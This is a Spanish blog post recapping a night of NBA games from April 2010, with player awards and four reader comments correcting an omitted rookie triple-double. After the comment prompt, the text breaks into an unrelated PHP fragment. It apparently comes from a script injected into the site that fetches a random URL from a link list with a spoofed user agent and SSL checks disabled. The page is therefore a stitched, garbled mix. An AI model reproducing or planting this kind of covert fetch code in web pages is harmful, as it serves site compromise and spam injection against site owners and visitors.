La Crónica (09/04/2010)

10 de April de 2010 por TheDeerHunter

Sin darnos apenas cuenta la temporada regular se nos escapa entre los dedos. Ahora nos morimos de ganas de que termine pero de aquí a no muchas semanas la echaremos bien de menos.

Poco queda por decidir. Los Lakers aseguraron su primera plaza del Oeste al tercer intento. Lo hicieron en el partido más desangelado de todos, contra los Wolves. Pau estuvo soberbio, como primera espada otra vez sin Kobe. Ahora hace falta ver si son capaces de aguantarle el ritmo a los Magic por una hipotética ventaja campo.

Los Mavs volvieron a la 2ª plaza con su trabajada victoria en Portland. Se asociaron indirectamente con los Thunder devolviéndoles así el favor de su brillante victoria en Phoenix. Como los Spurs también tropezaron contra Memphis, el equipo de Durant coge ventaja en la lucha por evitar a L.A. en primera ronda. Los Jazz si cumplieron ante NO, por cierto, con Deron Williams ante el equipo de un ausente CP3.

En el Este fue noche de favores. Los Bulls decidieron dar vidilla a unos Raptors completamente acabados. Perdieron ambos, los primeros ante los Nets y los segundos ante Atlanta, quienes a su vez aprovecharon la deferencia que tuvieron los Celtics perdiendo en casa contra Washington. ¡Qué amiguitos son todos!

Los Cavs también palmaron. LeBron se protege definitivamente hasta playoffs y su equipo perdió frente uno de los matagigantes por excelencia, Indiana. Los Magic, en cambio, todavía luchan y no se dejaron sorprender por los Knicks.

Como no podía ser de otra manera los Heat también le hicieron regalito a Milwaukee. Los primeros perdieron ante los Pistons y su “metamorfoseado” Ben Gordon, mientras que los Bucks hacían su trabajo contra Sixers, aprovechándose también de la derrota de Bobcats conta Rockets.

PREMIOS

MVP: Pau Gasol de mariscal general con 29 puntos, 15 rebotes y 4 asistencias. Para mariscales Deron Williams con 27 puntos, 16 asistencias y 4 rebotes. Empate técnico.

El rookie: Jonny Flynn suele brillar ante los actuales campeones. 19 puntos y 4 asistencias para un jugador de los que esperamos más cosas que lo que lleva demostrado.

La sorpresa: Apenas nos acordábamos de su existencia en el mundo de los vivos. Ben Gordon se destapó anoche con 39 puntazos que llegan demasiado tarde a cualquier lado.

La decepción: La inmensa defensa de Portland dejó a Dirk Nowitkzi en 40 puntos. Esto no debería ser noticia por lo bueno que es el alemán. La noticia fue el 4/14 de Brandon Roy y los 77 puntos finales del equipo.

El mayor esfuerzo en vano: Muchos son los llamados y pocos los elegidos. Gallinari 28, como Collison, partidos completísimos de Rondo o Stoudemire… pero hoy nos quedamos con el partidazo que se marcó Brad Miller para perder contra los Nets.

Comenta

4 comentarios a esta entrada

  1. HeiNeKeN dice:
    #1

    Creo que el triple-doble del Rookie de los Nets Terrence Williams deberia ser mencionado… 27-13-10 para el chaval

      Citar

  2. Rompe dice:
    #2

    Otro triple doble de un rookie, menuda hornada!

      Citar

  3. CAMPO2 dice:
    #3

    Estoy con vosotros, me imagino que Deer no habra visto el boxscore de los Nets para el premio de Rookie, vaya fin de te temporasa esta haciendo T. Williams

      Citar

  4. TheDeerHunter dice:
    #4

    tenéis razón, no me había percatado
    confieso que este año me fijo muy poco en lo que hacen los nets… y mucho menos un día como hoy con tantos partidos para comentar
    gracias por la corrección a todos

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>